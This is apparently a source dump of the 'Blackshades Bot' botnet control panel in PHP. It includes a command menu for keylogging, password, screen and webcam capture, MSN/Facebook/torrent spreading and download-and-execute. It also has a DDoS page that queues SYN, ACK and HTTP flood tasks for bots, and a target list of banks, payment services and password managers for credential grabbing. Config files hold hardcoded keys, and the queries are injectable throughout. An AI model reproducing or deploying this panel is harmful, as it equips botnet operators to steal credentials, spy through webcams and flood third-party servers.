610 <option value='WC'>Webcam capture</option>
611 <option value='BTKL'>Botkiller</option>
612 <option value='SPREAD-CONTACT'>Spreader - Add contact (MSN)</option>
613 <option value='SPREAD-MSG'>Spreader - Mass message (MSN)</option>
614 <option value='SPREAD-TORRENT'>Spreader - Torrent Seed</option>
615 <option value='SPREAD-FB'>Spreader - Facebook</option>
616 <option value='DLOAD'>Download and execute</option>
617 <option value='EMGB'>Email grabber</option>
618 <option value='UPDATE'>Update</option>
619 <option value='UNINSTALL'>Uninstall</option>
620 </select>
621 <label>Data:<input name="tf_data" type="text" id="tf_data" size="20"> <label>Bot ID:<input name="tf_hwid" type="text" id="tf_hwid" size="12"> <label>Count limit:<input name="tf_limit" type="text" id="tf_limit" size="10"> </label></label> <label>Allowed country:<input name="tf_filter" type="text" id="tf_filter" size="10"></label> <input type="submit" name="btn_cmd" id="btn_cmd" value="Add"/>
622 </div></form></center>
623 <br/>
624 <table width='50%' style='border:0px' align='center' cellspacing='0' cellpadding='1'>
625 <tr>
626 <td width='100%' class='tb_summary_cols'>
627 <div style="font-family:Arial;font-size:12px;color:#636363">
628 Keylog - Searches for a keyword by a given text from the field 'Data'.<br/>
629 Passwords - Collects passwords from bots. (Note: You may leave field 'Data' empty)<br/>
630 Screen capture - Collects screen captures from bots. (Note: You may leave field 'Data' empty)<br/>
631 Webcam capture - Collects webcam captures from bots. (Note: You may leave field 'Data' empty)<br/>
632 Botkiller - Removes external malware from your bots system. (Note: You may leave field 'Data' empty)<br/>
633 Spreader - Add contact (MSN) - Adds a contact given in the field 'Data'<br/>
634 Spreader - Mass message (MSN) - Sends a message to bots contacts, given in the field 'Data'<br/>
635 Spreader - Torrent Seed - Downloads and starts seeding a given torrent from an URL given in the field 'Data'<br/>
636 Spreader - Facebook - Post a message on bots walls given in the field 'Data'<br/>
637 Download and execute - Downloads the given file in the field 'Data', then executes it.<br/>
638 Email grabber - Grabs any found emails and saves them to logs. (Note: You may leave field 'Data' empty).<br/>
639 Update - Downloads the given file in the field 'Data', then executes it and removes the current bot.<br/>
640 Uninstall - Removes the bot completely. (Note: You may leave field 'Data' empty).<br/><br/>
641 Note: You may use the Bot ID-textfield only if you wish to associate the command with a specific bot.
642 </div>
643 </td>
644 </tr>
645 </table>
646<td width="20%">
647==> config.php <==
648<?php
649 //Database
650 define('DB_SERVER', "localhost");
651 define('DB_USER', "root"); //database login name
652 define('DB_PASS', "Uh77yerJ83nX"); //database login password
653 define('DB_DATABASE', "bs_bot"); //database name
654
655 //Security
656 $CFG_PASSWORD = "Blackshades_Key";
657 $CFG_ERROR_MSG = "Error: 404";
658 $CFG_UNATHORIZED = "Error: Your are not authorized to perform this action.";
659
660 //General
661 $DEAD_DAYS_MIN = 4; //Number of days offline before flagging bot as dead
662 $PAGE_ROWS_LIMIT = 100; //Number of records to display per page
663?>
664==> db:Database.singleton.php <==
665<?php
666 class Database{
667
668 // debug flag for showing error messages
669 public $debug = true;
670
671 // Store the single instance of Database
672 private static $instance;
673
674 private $server = ""; //database server
675 private $user = ""; //database login name
676 private $pass = ""; //database login password
677 private $database = ""; //database name
678
679 private $error = "";
680
681 #######################
682 //number of rows affected by SQL query
683 public $affected_rows = 0;
684
685 private $link_id = 0;
686 private $query_id = 0;
687
688 private function __construct($server=null, $user=null, $pass=null, $database=null){
689 // error catching if not passed in
690 if($server==null || $user==null || $pass==null || $database==null){
691 $this->oops("Database information must be passed in when the object is first created.");
692 }
693
694 $this->server=$server;
695 $this->user=$user;
696 $this->pass=$pass;
697 $this->database=$database;
698 }#-#constructor()
699
700 public function __destruct(){
701 $this->close();
702 }
703
704 public static function obtain($server=null, $user=null, $pass=null, $database=null){
705 if (!self::$instance){
706 self::$instance = new Database($server, $user, $pass, $database);
707 }
708
709 return self::$instance;
710 }#-#obtain()
711
712 public function connect($new_link=false){
713 $this->link_id=@mysql_connect($this->server,$this->user,$this->pass,$new_link);
714
715 if (!$this->link_id){//open failed
716 $this->oops("Could not connect to server: <b>$this->server</b>.");
717 }
718
719 if(!@mysql_select_db($this->database, $this->link_id)){//no database
720 $this->oops("Could not open database: <b>$this->database</b>.");
721 }
722
723 // unset the data so it can't be dumped
724 $this->server='';
725 $this->user='';
726 $this->pass='';
727 $this->database='';
728 }#-#connect()
729
730 public function close(){
731 if(!@mysql_close($this->link_id)){
732 $this->oops("Connection close failed.");
733 }
734 }#-#close()
735
736 public function escape($string){
737 if(get_magic_quotes_runtime()) $string = stripslashes($string);
738 return @mysql_real_escape_string($string,$this->link_id);
739 }#-#escape()
740
741 public function query($sql){
742 // do query
743 $this->query_id = @mysql_query($sql, $this->link_id);
744
745 if (!$this->query_id){
746 $this->oops("<b>MySQL Query fail:</b> $sql");
747 return 0;
748 }
749
750 $this->affected_rows = @mysql_affected_rows($this->link_id);
751
752 return $this->query_id;
753 }#-#query()
754
755 public function query_first($query_string){
756 $query_id = $this->query($query_string);
757 $out = $this->fetch($query_id);
758 $this->free_result($query_id);
759 return $out;
760 }#-#query_first()
761
762 public function fetch($query_id=-1){
763 // retrieve row
764 if ($query_id!=-1){
765 $this->query_id=$query_id;
766 }
767
768 if (isset($this->query_id)){
769 $record = @mysql_fetch_assoc($this->query_id);
770 }else{
771 $this->oops("Invalid query_id: <b>$this->query_id</b>. Records could not be fetched.");
772 }
773
774 return $record;
775 }#-#fetch()
776
777 public function fetch_array($sql){
778 $query_id = $this->query($sql);
779 $out = array();
780
781 while ($row = $this->fetch($query_id)){
782 $out[] = $row;
783 }
784
785 $this->free_result($query_id);
786 return $out;
787 }#-#fetch_array()
788
789 public function update($table, $data, $where='1'){
790 $q="UPDATE `$table` SET ";
791
792 foreach($data as $key=>$val){
793 if(strtolower($val)=='null') $q.= "`$key` = NULL, ";
794 elseif(strtolower($val)=='now()') $q.= "`$key` = NOW(), ";
795 elseif(preg_match("/^increment\((\-?\d+)\)$/i",$val,$m)) $q.= "`$key` = `$key` + $m[1], ";
796 else $q.= "`$key`='".$this->escape($val)."', ";
797 }
798
799 $q = rtrim($q, ', ') . ' WHERE '.$where.';';
800
801 return $this->query($q);
802 }#-#update()
803
804 public function insert($table, $data){
805 $q="INSERT INTO `$table` ";
806 $v=''; $n='';
807
808 foreach($data as $key=>$val){
809 $n.="`$key`, ";
810 if(strtolower($val)=='null') $v.="NULL, ";
811 elseif(strtolower($val)=='now()') $v.="NOW(), ";
812 else $v.= "'".$this->escape($val)."', ";
813 }
814
815 $q .= "(". rtrim($n, ', ') .") VALUES (". rtrim($v, ', ') .");";
816
817 if($this->query($q)){
818 return mysql_insert_id($this->link_id);
819 }
820 else return false;
821
822 }#-#insert()
823
824 private function free_result($query_id=-1){
825 if ($query_id!=-1){
826 $this->query_id=$query_id;
827 }
828 if($this->query_id!=0 && !@mysql_free_result($this->query_id)){
829 $this->oops("Result ID: <b>$this->query_id</b> could not be freed.");
830 }
831 }#-#free_result()
832
833 private function oops($msg=''){
834 if(!empty($this->link_id)){
835 $this->error = mysql_error($this->link_id);
836 }
837 else{
838 $this->error = mysql_error();
839 $msg="<b>WARNING:</b> No link_id found. Likely not be connected to database.<br />$msg";
840 }
841
842 if(!$this->debug) return;
843 ?>
844 <table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;">
845 <tr><th colspan=2>Database Error</th></tr>
846 <tr><td align="right" valign="top">Message:</td><td><?php echo $msg; ?></td></tr>
847 <?php if(!empty($this->error)) echo '<tr><td align="right" valign="top" nowrap>MySQL Error:</td><td>'.$this->error.'</td></tr>'; ?>
848 <tr><td align="right">Date:</td><td><?php echo date("l, F j, Y \a\\t g:i:s A"); ?></td></tr>
849 <?php if(!empty($_SERVER['REQUEST_URI'])) echo '<tr><td align="right">Script:</td><td><a href="'.$_SERVER['REQUEST_URI'].'">'.$_SERVER['REQUEST_URI'].'</a></td></tr>'; ?>
850 <?php if(!empty($_SERVER['HTTP_REFERER'])) echo '<tr><td align="right">Referer:</td><td><a href="'.$_SERVER['HTTP_REFERER'].'">'.$_SERVER['HTTP_REFERER'].'</a></td></tr>'; ?>
851 </table>
852 <?php
853 }#-#oops()
854 }
855?>
856==> db:authclass.php <==
857<?php
858 class AuthClass {
859 function AuthClass() {
860 @session_start();
861
862 if (!isset($_SESSION['logged'])) {
863 $this->session_defaults();
864 }
865
866 }
867
868 function session_defaults() {
869 @session_start();
870 $_SESSION['logged'] = false;
871 $_SESSION['uid'] = 0;
872 $_SESSION['username'] = '';
873 }
874
875 function checkLogin($username,$password) {
876 global $db;
877 $username = $db->escape($username);
878 $password = $db->escape($password);
879 $password = sha1($password);
880
881 $sql = "SELECT `acc_id`,`acc_name` FROM tbl_account WHERE acc_name='$username' and acc_pw='$password'";
882 $match = $db->query_first($sql);
883
884 if (!empty($match)) {
885 $this->setSession($match);
886 return true;
887 } else {
888 $_SESSION['msg'] = "Invalid username or password!";
889 return false;
890 }
891 }
892
893 function setSession($match) {
894 @session_start();
895 global $db;
896 $_SESSION['uid'] = $match['acc_id'];
897 $_SESSION['username'] = htmlspecialchars($match['acc_name']);
898 $_SESSION['logged'] = true;
899 $_SESSION['msg'] = "";
900
901 $ip = $_SERVER['REMOTE_ADDR'];
902 $db->query("UPDATE tbl_account SET acc_session = '".session_id()."', acc_lastip = '$ip' WHERE acc_id = '".$_SESSION['uid']."'");
903 }
904
905 function checkSession() {
906 @session_start();
907 global $db;
908 $ip = $_SERVER['REMOTE_ADDR'];
909 $row = $db->query_first("SELECT count(*) FROM tbl_account WHERE (acc_id = '".$_SESSION['uid']."') AND (acc_session = '".session_id()."') AND (acc_lastip = '$ip')");
910
911 if($_SESSION['logged'] && ($row['count(*)']!=0)){
912 return true;
913 }
914
915 if($_SESSION['logged'] && ($row['count(*)']==0)){
916 $_SESSION['msg'] = "One login per ip and user!";
917 }
918
919 $this->session_defaults();
920 return false;
921 }
922
923 function set_privileges($username){
924 global $db;
925 $res = $db->query_first("SELECT acc_type FROM tbl_account WHERE acc_name = '{$username}'");
926 $_SESSION['privileges'] = $res['acc_type'];
927 }
928
929 function authenticate($username,$password) {
930 @session_start();
931 $ret = $this->checkLogin($username,$password);
932 $this->set_privileges($username); //Set account privileges
933 return $ret;
934 }
935
936 function verify() {
937 return $this->checkSession();
938 }
939
940 function logout() {
941 @session_start();
942 @session_unset();
943 @session_destroy();
944 }
945 }
946?>
947==> db:database.inc.php <==
948<?php
949 // pull in the file with the database class
950 require("Database.singleton.php");
951 require("./config.php"); //Read database settings
952
953 $db = Database::obtain(DB_SERVER, DB_USER, DB_PASS, DB_DATABASE);
954 $db->connect();
955
956 require("authclass.php");
957 $auth = new AuthClass();
958?>
959==> db:index.php <==
960<?php
961 include_once('../config.php');
962 echo $CFG_ERROR_MSG;
963?>
964==> dos.php <==
965<?php
966 error_reporting(0);
967 include_once('db/database.inc.php');
968 include_once('config.php');
969
970 if(isset($_POST['btn_dos']))
971 {
972 if(empty($_POST['tf_filter'])){
973 $cmd_filter = "All";
974 }else{
975 $cmd_filter = $_POST['tf_filter'];
976 }
977
978 $res = mysql_query("INSERT INTO tbl_dos (dos_type, dos_target, dos_port, dos_protocol, dos_filter_limit, dos_filter_country)
979 VALUES ('" . $_POST['dos_type'] . "', '" . $_POST['tf_target'] . "', '" . $_POST['tf_port'] .
980 "', '" . $_POST['dos_protocol'] . "', '" . $_POST['tf_limit'] . "', '" . $cmd_filter . "')") or die(mysql_error());
981 }
982
983 if(isset($_GET['key']) && isset($_GET['hwid'])) //Get active ddos tasks
984 {
985 if($_GET['key'] == $CFG_PASSWORD){ //Auth check
986 $res = mysql_query("SELECT dos_id, dos_type, dos_target, dos_port, dos_protocol, dos_filter_limit, dos_filter_exec, dos_filter_country FROM tbl_dos");
987 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
988 $check = mysql_query("SELECT bot_hwid FROM tbl_dos_exec WHERE bot_hwid = '{$_GET['hwid']}' AND dos_id = {$row['dos_id']}");
989 if(mysql_num_rows($check) == 0){ //Make sure this hasn't already been sent to this bot
990 if($row['dos_filter_limit'] == '0'){
991 date_default_timezone_set(date_default_timezone_get());
992 $date = new DateTime("now");
993 $exec = mysql_query("INSERT INTO tbl_dos_exec (dos_id, bot_hwid, exec_date, exec_time) VALUES ('" . $row['dos_id'] . "', '" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')") or die(); //Increase number of executions
994
995 echo $row['dos_type'] . "<dm>" . $row['dos_target'] . "<dm>" . $row['dos_port'] . "<dm>" . $row['dos_protocol'] . "<dm>" .
996 $row['dos_filter_country'] . "<br/>";
997 $exec = mysql_query("UPDATE tbl_dos SET dos_filter_exec = dos_filter_exec + 1 WHERE dos_id = {$row['dos_id']}"); //Increase number of executions
998 }else{ //Count limit check
999 if($row['dos_filter_exec'] < $row['dos_filter_limit']){
1000 $date = new DateTime("now");
1001 $exec = mysql_query("INSERT INTO tbl_dos_exec (dos_id, bot_hwid, exec_date, exec_time) VALUES ('" . $row['dos_id'] . "', '" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')") or die();
1002
1003 echo $row['dos_type'] . "<dm>" . $row['dos_target'] . "<dm>" . $row['dos_port'] . "<dm>" . $row['dos_protocol'] . "<dm>" .
1004 $row['dos_filter_country'] . "<br/>";
1005 $exec = mysql_query("UPDATE tbl_dos SET dos_filter_exec = dos_filter_exec + 1 WHERE dos_id = {$row['dos_id']}"); //Increase number of executions
1006 }
1007 }
1008 }else{
1009 echo $row['dos_type'] . "<dm>" . $row['dos_target'] . "<dm>" . $row['dos_port'] . "<dm>" . $row['dos_protocol'] . "<dm>" .
1010 $row['dos_filter_country'] . "<br/>";
1011 }
1012 }
1013 }else{ //Wrong password/key
1014 echo $CFG_ERROR_MSG;
1015 }
1016 exit;
1017 }
1018
1019 if (!$auth->verify()){ //If unauthorized
1020 Header("Location: index.php");
1021 exit;
1022 }
1023
1024 //Check privileges
1025 if($_SESSION['privileges'] == '0'){
1026 echo $CFG_UNATHORIZED;
1027 exit;
1028 }
1029?>
1030
1031<html>
1032<header>
1033<style type="text/css">
1034body {
1035 margin:0px;
1036 padding:0px;
1037 background:#202020;
1038 color:#8e8e8e;
1039 font-family:Arial;
1040 font-size:12px
1041}
1042table { color:#8e8e8e;font-family:Arial;font-size:12px}
1043a { color:#8e8e8e;text-decoration:none;}
1044input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1045 <!--
1046 .tb_summary {
1047 text-align: center;
1048 font-weight: bold;
1049 }
1050 .tb_summary_cols {
1051 text-align: center;
1052 }
1053 .tb_summary_cols {
1054 text-align: left;
1055 }
1056 .tb_col_header {
1057 font-weight: bold;
1058 text-align: left;
1059 font-size:14px
1060 }
1061 div.img img
1062 {
1063 margin:3px;
1064 border:1px solid #202020;
1065 }
1066 div.img a:hover img
1067 {
1068 border:1px solid #0000ff;
1069 }
1070 -->
1071</style>
1072</header>
1073<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">DDoS
1074<?php include_once('header.php'); ?>
1075
1076<title>Blackshades Bot</title>
1077<br/><br/><br/>
1078<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Active attacks</span> <img src="img/main/cmd.png" width="16" height="16"/></div></center>
1079<?php
1080 if(isset($_GET['dosdel'])) //Delete attack
1081 {
1082 $res = mysql_query("DELETE FROM tbl_dos WHERE dos_id = {$_GET['dosdel']}");
1083 }
1084
1085 $res = mysql_query("SELECT dos_id, dos_type, dos_target, dos_port, dos_protocol, dos_filter_limit, dos_filter_exec, dos_filter_country FROM tbl_dos ORDER BY dos_id ASC");
1086 echo "<table width='1024' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
1087 echo "<tr><th width='12%' class='tb_col_header'>" . "<img src='img/main/cmd.png' width='14' height='14'/> " . "Dos type</th>" .
1088 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/site.png' width='14' height='14'/> " . "Target</th>" .
1089 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/connect.png' width='14' height='14'/> " . "Port</th>" .
1090 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/table.png' width='14' height='14'/> " . "Protocol</th>" .
1091 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Count limit</th>" .
1092 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/exec.png' width='14' height='14'/> " . "Executions</th>" .
1093 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Allowed country</th>" .
1094 "<th width='10%' class='tb_col_header'> </th></tr>";
1095
1096 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
1097 echo "<tr><td width='12%' class='tb_summary_cols'> </td>" .
1098 "<td width='20%' class='tb_summary_cols'> </td>" .
1099 "<td width='8%' class='tb_summary_cols'> </td>" .
1100 "<td width='8%' class='tb_summary_cols'> </td>" .
1101 "<td width='12%' class='tb_summary_cols'> </td>" .
1102 "<td width='12%' class='tb_summary_cols'> </td>" .
1103 "<td width='12%' class='tb_summary_cols'> </td>" .
1104 "<td width='10%' class='tb_summary_cols'> </td></tr>";
1105
1106 if($row['dos_filter_limit'] == '0')
1107 $limit = 'N/A';
1108 else
1109 $limit = $row['dos_filter_limit'];
1110
1111 echo "<tr><td width='12%' class='tb_summary_cols'>" . $row['dos_type'] . "</td>" .
1112 "<td width='20%' class='tb_summary_cols'>" . $row['dos_target'] . "</td>" .
1113 "<td width='8%' class='tb_summary_cols'>" . $row['dos_port'] . "</td>" .
1114 "<td width='8%' class='tb_summary_cols'>" . $row['dos_protocol'] . "</td>" .
1115 "<td width='12%' class='tb_summary_cols'>" . $limit . "</td>" .
1116 "<td width='12%' class='tb_summary_cols'>" . $row['dos_filter_exec'] . "</td>" .
1117 "<td width='12%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['dos_filter_country']) . ".gif' width='16' height='12'/> " . $row['dos_filter_country'] . "</td>" .
1118 "<td width='10%' class='tb_summary_cols'>" . "<div class='img'><a href='dos.php?doscountry={$row['dos_id']}'><img src='img/main/country.png' width='16' height='16'/></a><a href='dos.php?dosinfo={$row['dos_id']}'><img src='img/main/info.png' width='16' height='16'/></a><a href='dos.php?dosdel={$row['dos_id']}'><img src='img/main/remove.png' width='16' height='16'/></a></div></td></tr>";
1119 }
1120 echo "</table><br/><br/>";
1121
1122 if(isset($_GET['dosinfo'])) //Specific info regarding an attack
1123 {
1124 $res = mysql_query("SELECT bot_id, tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, exec_time FROM " .
1125 "tbl_bot,tbl_dos_exec WHERE dos_id = '{$_GET['dosinfo']}' AND tbl_bot.bot_hwid = tbl_dos_exec.bot_hwid");
1126
1127 echo "<center><div style='font-family:Arial;font-size:16px;color:#636363'><span class='tb_summary'>Affected bots</span></div></center>";
1128 echo "<table width='80%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
1129 echo "<tr><th width='5%' class='tb_col_header'>" . "<img src='img/main/id.png' width='14' height='14'/> " . "ID</th>" .
1130 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "HWID</th>" .
1131 "<th width='7%' class='tb_col_header'>" . "<img src='img/main/wan.png' width='14' height='14'/> " . "WAN</th>" .
1132 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/pc.png' width='14' height='14'/> " . "PC Name</th>" .
1133 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
1134 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/seen.png' width='14' height='14'/> " . "Date of execution</th></tr>";
1135
1136 echo "<tr><td width='5%' class='tb_summary_cols'> </td>" .
1137 "<td width='8%' class='tb_summary_cols'> </td>" .
1138 "<td width='7%' class='tb_summary_cols'> </td>" .
1139 "<td width='15%' class='tb_summary_cols'> </td>" .
1140 "<td width='10%' class='tb_summary_cols'> </td>" .
1141 "<td width='12%' class='tb_summary_cols'> </td></tr>";
1142
1143 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
1144 echo "<tr><td width='5%' class='tb_summary_cols'>" . $row['bot_id'] . "</td>" .
1145 "<td width='8%' class='tb_summary_cols'>" . $row['bot_hwid'] . "</td>" .
1146 "<td width='7%' class='tb_summary_cols'>" . $row['bot_wan'] . "</td>" .
1147 "<td width='15%' class='tb_summary_cols'>" . $row['bot_pc_user'] . "</td>" .
1148 "<td width='10%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . "</td>" .
1149 "<td width='12%' class='tb_summary_cols'>" . $row['exec_time'] . "</td></tr>";
1150 }
1151 echo "</table>" . "<br/><br/>";
1152 }
1153
1154 if(isset($_GET['doscountry'])) //Specific info regarding an attack
1155 {
1156 $res = mysql_query("SELECT bot_country, COUNT(bot_id) FROM tbl_bot,tbl_dos_exec WHERE dos_id = '{$_GET['doscountry']}' AND tbl_bot.bot_hwid = tbl_dos_exec.bot_hwid GROUP BY bot_country");
1157 echo "<center><div style='font-family:Arial;font-size:16px;color:#636363'><span class='tb_summary'>Affects bots by country</span></div></center>";
1158 echo "<table width='25%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
1159 echo "<tr><th width='20%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
1160 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Total</th>";
1161
1162 echo "<tr><td width='35%' class='tb_summary_cols'> </td>" .
1163 "<td width='8%' class='tb_summary_cols'> </td></tr>";
1164
1165 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
1166 echo "<tr>".
1167 "<td width='35%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . "</td>" .
1168 "<td width='8%' class='tb_summary_rows'>" . $row['COUNT(bot_id)'] . "</td>" .
1169 "</tr>";
1170 }
1171 echo "</table>" . "<br/><br/>";
1172 }
1173?>
1174<br/>
1175<center>
1176 <form id="f_dos" name="f_dos" method="post" action="">
1177 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary"><img src='img/main/type.png' width='16' height='16'/> DDoS type:</span>
1178 <select name="dos_type" id="dos_type">
1179 <option value='SYN'>SYN-Attack</option>
1180 <option value='ACK'>ACK-Attack</option>
1181 <option value='HTTP'>HTTP GET-Attack</option>
1182 <option value='HTTPS'>HTTPS/SSL-Attack</option>
1183 </select>
1184 <label>Target:<input name="tf_target" type="text" id="tf_target" size="20"> </label><label>Port:<input name="tf_port" type="text" id="tf_port" size="8"> </label>
1185 <span class="tb_summary"><img src='img/main/table.png' width='16' height='16'/>Protocol:</span>
1186 <select name="dos_protocol" id="dos_protocol">
1187 <option value='TCP'>TCP</option>
1188 <option value='UDP'>UDP</option>
1189 </select>
1190 <br/><br/>
1191 <label>Count limit:<input name="tf_limit" type="text" id="tf_limit" size="10"> </label> <label>Allowed country:<input name="tf_filter" type="text" id="tf_filter" size="10"></label> <input type="submit" name="btn_dos" id="btn_dos" value="Add"/>
1192 </div>
1193 </form>
1194</center>
1195==> fg.php <==
1196<?php
1197 error_reporting(0);
1198 include_once('config.php');
1199
1200 if(isset($_GET['key'])){
1201 if($_GET['key'] != $CFG_PASSWORD){ //If password mismtach
1202 echo $CFG_ERROR_MSG;
1203 exit;
1204 }
1205 }else{ //Invalid request
1206 echo $CFG_ERROR_MSG;
1207 exit;
1208 }
1209?>
1210PayPal:http://paypal.com
1211Payment Gateway:http://authorize.net
1212Plimus:http://plimus.com
1213Amazon:http://amazon.com
1214Newegg:http://newegg.com
1215AlertPay:http://alertpay.com
1216WebMoney:http://wmtransfer.com
1217Moneybookers:http://moneybookers.com/app
1218Liberty Reserve:http://libertyreserve.com
1219ePassporte:http://epassporte.com
1220Google Checkout:http://checkout.google.com
1221Best Buy:http://bestbuy.com
1222Escrow:http://escrow.com
1223LastPass:http://lastpass.com
1224RoboForm:http://roboform.com
1225Xmarks:http://xmarks.com
1226ADrive:http://adrive.com
1227IBackup:http://ibackup.com
1228Myspace:http://myspace.com
1229Facebook:http://facebook.com
1230Lockerz:http://lockerz.com
1231TheVault:http://thevault.bz
1232Online Internet Marketing:http://forums.digitalpoint.com
1233WarriorForum:http://warriorforum.com
1234Black Hat SEO Forum:http://blackhatworld.com
1235RapidShare:http://rapidshare.com
1236MEGAUPLOAD:http://megaupload.com
1237MEGAVIDEO:http://megavideo.com
1238Hotfile:http://hotfile.com
1239FileServe:http://fileserve.com
1240Deposit Files:http://depositfiles.com
1241FileSonic:http://filesonic.com
1242ul.to:http://uploaded.to
1243FileFactory:http://filefactory.com
1244Unlimited free file storage:http://megashare.com
1245RuneScape:http://runescape.com
1246World of Warcraft:http://us.battle.net
1247EA Video Games:http://ea.com
1248Bank of America:http://bankofamerica.com
1249TCF Bank:http://tcfbank.com
1250Harris Bank:http://harrisbank.com
1251PNC Bank:http://pnc.com
1252CHASE Home:http://chase.com
1253Fifth Third Bank:http://53.com
1254Citibank:http://citibank.com
1255Target:http://target.com
1256Walmart.com:http://walmart.com
1257Consoles | GameStop:http://gamestop.com
1258FilePlanet:http://fileplanet.com
1259League of Legends LoL:http://leagueoflegends.com
1260Gunbound:http://gunbound.com
1261AT&T:http://att.com
1262T-Mobile:http://t-mobile.com
1263Go Daddy:http://godaddy.com
1264NameCheap:http://namecheap.com
1265Network Solutions:http://networksolutions.com
1266Verizon:http://verizon.com
1267U.S. Cellular:http://uscellular.com
1268GameFly:http://gamefly.com
1269Netflix:http://netflix.com
1270craigslist:http://craigslist.org
1271Xanga:http://xanga.com
1272PlayStation:http://playstation.com
1273IMVU:http://imvu.com
1274Direct2Drive:http://direct2drive.com
1275ILoveI:http://iloveim.com
1276deviantART:http://deviantart.com
1277Warez-BB:http://warez-bb.org
1278Hack Forums:http://hackforums.net
1279SitePoint:http://sitepoint.com
1280Western Union:http://westernunion.com
1281==> header.php <==
1282<tr>
1283 <td style="font-size:12px;background:#272727">
1284 <table align="center" style="margin:0px;padding:0px;font-size:11px;color:#8e8e8e">
1285 <tr>
1286 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="main.php">Main</a></td>
1287 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="bots.php">Bots</a></td>
1288 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="logs.php">Logs</a></td>
1289 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="pws.php">Passwords</a></td>
1290 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="cmd.php">Commands</a></td>
1291 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="dos.php">DDoS</a></td>
1292 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="settings.php">Settings</a></td>
1293 <td style="width:120px;background:#3b3b3b;text-align:center"><a href="logout.php">Logout</a></td>
1294 </tr>
1295 </table>
1296 </td>
1297</tr></table>
1298==> img:index.php <==
1299<?php
1300 include_once('../config.php');
1301 echo $CFG_ERROR_MSG;
1302?>
1303==> index.php <==
1304<?php
1305 //Check to see if DB has been installed
1306 //include_once('config.php');
1307 include_once('db/database.inc.php');
1308
1309 $conn=mysql_connect(DB_SERVER, DB_USER, DB_PASS);
1310 if (!$conn)
1311 {
1312 echo "<center><h3>Error: Cannot connect to database!</center></h3>";
1313 exit;
1314 }
1315
1316 mysql_select_db(DB_DATABASE)or die(Header("Location: install.php")); //Need to install
1317 if(!mysql_num_rows(mysql_query("SHOW TABLES LIKE 'tbl_account'")))
1318 {
1319 Header("Location: install.php");
1320 }
1321
1322 if(isset($_POST['bt_login'])) //For login
1323 {
1324 $username = $_POST['tx_username'];
1325 $pass = $_POST['tx_password'];
1326
1327 if($auth->authenticate($username, $pass)){
1328 Header("Location: main.php");
1329 exit;
1330 }else{
1331 echo '<center><h3>Log in failed</h3></center>';
1332 exit;
1333 }
1334 }
1335?>
1336
1337<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1338<html xmlns="http://www.w3.org/1999/xhtml">
1339 <head>
1340 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1341 <title>Blackshades Bot</title>
1342 <style type="text/css">
1343 <!--
1344 #form1 {
1345 text-align: left;
1346 }
1347 -->
1348body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
1349table { color:#8e8e8e;font-family:Arial;font-size:12px}
1350a { color:#8e8e8e;text-decoration:none;}
1351input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1352 </style>
1353 </head>
1354 <body>
1355<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Blackshades Bot - Log in</td></tr></table>
1356
1357 <form id="form_submit" name="form_submit" method="post" action="">
1358 <p>
1359 <table align="center"><tr>
1360 </p>
1361 <p><br/>
1362 <tr><td><label>Username:</td>
1363 <td> <input type="text" name="tx_username" id="tx_username" /> <img src="img/main/username.png" width="16" height="16"/></td></tr>
1364 </label>
1365 </p>
1366 <p>
1367 <tr><td><label>Password:</td>
1368 <td> <input type="password" name="tx_password" id="tx_password" /> <img src="img/main/key.png" width="16" height="16"/></td></tr>
1369 <tr><td><br/><input type="submit" name="bt_login" id="bt_login" value="Login" /></td>
1370 </form>
1371 </table>
1372 </label>
